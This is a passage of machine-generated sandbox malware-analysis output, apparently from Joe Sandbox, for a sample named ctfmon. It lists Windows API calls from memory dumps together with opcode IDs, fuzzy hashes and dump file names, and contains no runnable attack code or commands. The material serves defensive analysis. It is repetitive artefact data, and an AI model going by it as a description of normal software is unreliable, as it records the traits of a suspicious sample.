        • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00410158
        • GetFileType.KERNEL32(00000000,?,00000000), ref: 00410166
        • SetHandleCount.KERNEL32 ref: 0041019D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileHandleType$CountInfoStartup
        • String ID:
        • API String ID: 1710529072-0
        • Opcode ID: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
        • Instruction ID: 9efafb25e1c49cefaa9801ddeb0c15ad3ba9d2cf75d41a5d73fe4d8c6704c713
        • Opcode Fuzzy Hash: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
        • Instruction Fuzzy Hash: 855138315042059BC7208B68DC847EA7BE0FB16338F24466EC592DB2E1D7BED8DAC759
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$H_prologLocaleMessageSendTextThread
        • String ID:
        • API String ID: 741590120-0
        • Opcode ID: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
        • Instruction ID: f9e5b8384eab3ba489f7196092203c7d724fd180af1cedfd33864e84ada0d436
        • Opcode Fuzzy Hash: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
        • Instruction Fuzzy Hash: 1051AF70914716DFDB20DF65C9404AAB7F0FF14314B22852EE897AB3A0E738E961CB59
        APIs
        • SysAllocString.OLEAUT32(?), ref: 0042A739
          • Part of subcall function 00424B39: LoadStringW.USER32(?,?,?,?), ref: 00424B50
        • SysAllocString.OLEAUT32(?), ref: 0042A748
        • SysAllocString.OLEAUT32(?), ref: 0042A78E
        • SysAllocString.OLEAUT32(?), ref: 0042A7A2
        • SysAllocString.OLEAUT32(?), ref: 0042A7BF
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$Alloc$Load
        • String ID:
        • API String ID: 3862620831-0
        • Opcode ID: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
        • Instruction ID: 6803650498ba4989a99e64115ce7b714a56dc8d8622e699d9d0cda383d46dfbc
        • Opcode Fuzzy Hash: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
        • Instruction Fuzzy Hash: F8317C30600710AFC720EF26E885B5AB7F5BF84700F50892BE85997691D778E891CB9A
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
        • Instruction ID: 5f9584f858f3fd3441d1eeae4cb6474de1c9940f427edf65aea8a548a520b4bc
        • Opcode Fuzzy Hash: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
        • Instruction Fuzzy Hash: 8D31B475650210AFD330DF19EC856E637A0FBA1358F20653AD60AC72E1D734988ECB94
        APIs
        • GetMapMode.GDI32(?,?,?,?,?,?,00407740,?,00000000,?,?,?,?,?,?,?), ref: 004278D7
        • GetDeviceCaps.GDI32(?,00000058), ref: 00427911
        • GetDeviceCaps.GDI32(?,0000005A), ref: 0042791A
          • Part of subcall function 004265E6: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
          • Part of subcall function 004265E6: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
          • Part of subcall function 004265E6: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
          • Part of subcall function 004265E6: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644
        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042793E
        • MulDiv.KERNEL32(00000002,000009EC,?), ref: 00427949
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CapsDevice$ModeViewportWindow
        • String ID:
        • API String ID: 2598972148-0
        • Opcode ID: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
        • Instruction ID: 6e5dd03be2f2a077cc23b63b074e70d19be67c8710d15462bb73e943247fa81e
        • Opcode Fuzzy Hash: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
        • Instruction Fuzzy Hash: C211CE71700624EFEB21AF55EC44C2FBBE9EF88750B51402AE98597321D771AC829F54
        APIs
        • __EH_prolog.LIBCMT ref: 00422724
        • GetClassInfoW.USER32(?,?,?), ref: 0042273F
        • RegisterClassW.USER32(00000004), ref: 0042274A
        • lstrcatW.KERNEL32(00000034,?,00000001), ref: 00422781
        • lstrcatW.KERNEL32(00000034,00000004), ref: 00422792
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Classlstrcat$H_prologInfoRegister
        • String ID:
        • API String ID: 106226465-0
        • Opcode ID: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
        • Instruction ID: 6b4f5334b2da6ce01ac7bdb77f7903c950944f1e7d17838be749cb4d6a50b4f5
        • Opcode Fuzzy Hash: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
        • Instruction Fuzzy Hash: 4111E535701324BEDB10AFA1ED81A9E7BB8EF44754F40452EFC05A7151CBB496018B99
        APIs
        • GetLastError.KERNEL32(00000103,7FFFFFFF,0040F933,004152C9,00000000,?,?,00000000,00000001), ref: 00410211
        • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0041021F
        • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041026B
          • Part of subcall function 00413F58: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 0041404E
        • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00410243
        • GetCurrentThreadId.KERNEL32 ref: 00410254
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorLastValue$AllocCurrentHeapThread
        • String ID:
        • API String ID: 2020098873-0
        • Opcode ID: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
        • Instruction ID: e67e7c9409d6482dbb0cac13eed9dcc457f33c4e76e944be94ce0609059d711d
        • Opcode Fuzzy Hash: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
        • Instruction Fuzzy Hash: 80F02B32B055129BC7302F71AC4E5AE3A60EF02771B50017AF842A52F0CFB88CC28A6D
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$LockUnlocklstrlen
        • String ID: @
        • API String ID: 1794151802-2766056989
        • Opcode ID: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
        • Instruction ID: 56caa2758e9c52820e3943fc16772618d0e7bec53ae05310eb2a7808f0609bc1
        • Opcode Fuzzy Hash: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
        • Instruction Fuzzy Hash: 89311A32900616EBCF14DF94D8856AFBBB4FF00354F5485AAD805AB280D3789E46CF98
        APIs
        • GetMenuCheckMarkDimensions.USER32 ref: 00427E76
        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00427F25
        • LoadBitmapW.USER32(00000000,00007FE3), ref: 00427F3D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
        • String ID:
        • API String ID: 2596413745-3916222277
        • Opcode ID: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
        • Instruction ID: 3dac30640d0aaed0d39e7c8ba4964ad4c3cd7e2de72bd744148c463c93ab964f
        • Opcode Fuzzy Hash: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
        • Instruction Fuzzy Hash: 0C213772F00225AFDB20CF78DC85BAE7BB8EB44314F4541A6E505EB2C2D7749A058B54
        APIs
        • WaitForSingleObject.KERNEL32(00000344,00007530), ref: 00402AFA
        • ResetEvent.KERNEL32(00000344), ref: 00402B07
        • SetEvent.KERNEL32(00000344), ref: 00402B81
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$ObjectResetSingleWait
        • String ID: DW-FI
        • API String ID: 463700304-2755525259
        • Opcode ID: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
        • Instruction ID: aee5816b9cca93473e57ae48154deca15eed2f9060ecf18fe0870dd8285205ab
        • Opcode Fuzzy Hash: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
        • Instruction Fuzzy Hash: 6A110876600301AFC318DF54EC889A67BB0FB98300F40482CF51563391E778954EDBB2
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
        • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
        • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00416871,?), ref: 0041253D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 352835431-109923292
        • Opcode ID: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
        • Instruction ID: ede44e41d23e5143c76023491ad2abd4dbb5e4cc9370e92a33f97a9eab123c69
        • Opcode Fuzzy Hash: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
        • Instruction Fuzzy Hash: CB113A32A00549EBCF228F84CE41ADEBBB6EB48750F548156F924B2160D37A8DB1DB58
        APIs
        • GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
        • GetClassNameW.USER32(00000000,?,0000000A), ref: 0042697C
        • lstrcmpiW.KERNEL32(?,combobox,?,00407730,00000000), ref: 0042698B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClassLongNameWindowlstrcmpi
        • String ID: combobox
        • API String ID: 2054663530-2240613097
        • Opcode ID: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
        • Instruction ID: 5a3d263a88e3f3d6520d42c127d3d6d56894c682c1a0552d8ed4dfe0903393cf
        • Opcode Fuzzy Hash: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
        • Instruction Fuzzy Hash: 8AE06571754119BBCF11AF64DC4AE6F3B68A701341FA08222B412E51A1DA34E5968A6A
        APIs
        • GetModuleHandleA.KERNEL32(KERNEL32,0040F086), ref: 00414670
        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00414680
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressHandleModuleProc
        • String ID: IsProcessorFeaturePresent$KERNEL32
        • API String ID: 1646373207-3105848591
        • Opcode ID: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
        • Instruction ID: e08e1aaa38df6158061f31c1e92fe184261e3872a30fdf9be053d858ffc3e291
        • Opcode Fuzzy Hash: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
        • Instruction Fuzzy Hash: 19C01270BC0302E6DA241BF02C99FAA332C0F82B8AF9502B26205E0094CE9DC086903D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
        • Instruction ID: c53f18b298c334f67eaf08f9ae9cc2dd99c59691f0b3e42a7d6712c8fe277865
        • Opcode Fuzzy Hash: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
        • Instruction Fuzzy Hash: 24910472D01214AACF31AB69DD40ADF7A78EB55764F20023BFC14B66D1D33A5D848BAC
        APIs
        • HeapAlloc.KERNEL32(00000000,00002020,00439C00,00439C00,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138AC
        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138D0
        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138EA
        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?), ref: 004139AB
        • HeapFree.KERNEL32(00000000,00000000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?,00000000), ref: 004139C2
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocVirtual$FreeHeap
        • String ID:
        • API String ID: 714016831-0
        • Opcode ID: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
        • Instruction ID: e0fbc1c5489a36fa46b370c331ae166ff60e5c5d4513b139ca63262e897aab2f
        • Opcode Fuzzy Hash: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
        • Instruction Fuzzy Hash: F631CFB0640701ABD3308F24DC45BA6BBE4EB44756F10953AE1969B390EBB8A985CB4C
        APIs
        • __EH_prolog.LIBCMT ref: 00409478
        • VariantClear.OLEAUT32(?), ref: 0040952A
        • CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095C7
        • CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095D5
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FreeTask$ClearH_prologVariant
        • String ID:
        • API String ID: 82050969-0
        • Opcode ID: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
        • Instruction ID: 7a4f58fe1ca51ad8bd86bb919bdeb9b1e6d69dac6bd0573dd5a3036f94321626
        • Opcode Fuzzy Hash: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
        • Instruction Fuzzy Hash: A9613C32600601DFCB20DFA5D9C496AB7F6BF48304754497EE146AB7A2CB39EC46CB54
        APIs
        • IsWindowVisible.USER32(?), ref: 004097CC
        • GetDesktopWindow.USER32 ref: 004097DF
        • GetWindowRect.USER32(?,?), ref: 004097F2
        • GetWindowRect.USER32(?,?), ref: 004097FF
          • Part of subcall function 004242D8: MoveWindow.USER32(?,?,?,00000000,?,?,?,00409940,?,?,?,?,00000000), ref: 004242F4
          • Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$DesktopMoveShowVisible
        • String ID:
        • API String ID: 3835705305-0
        • Opcode ID: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
        • Instruction ID: 8b8ab32d8fa83548fa5c41fe31c716bdd51a77ece67491eaac64cceb9160e636
        • Opcode Fuzzy Hash: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
        • Instruction Fuzzy Hash: 17512C71A0021AEFCB04DFA9D984DAEB7B9FF89704B60446DF106E72A1C735AD01CB24
        APIs
        • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,0053CB6B,?), ref: 0041271F
        Memory Dump Source
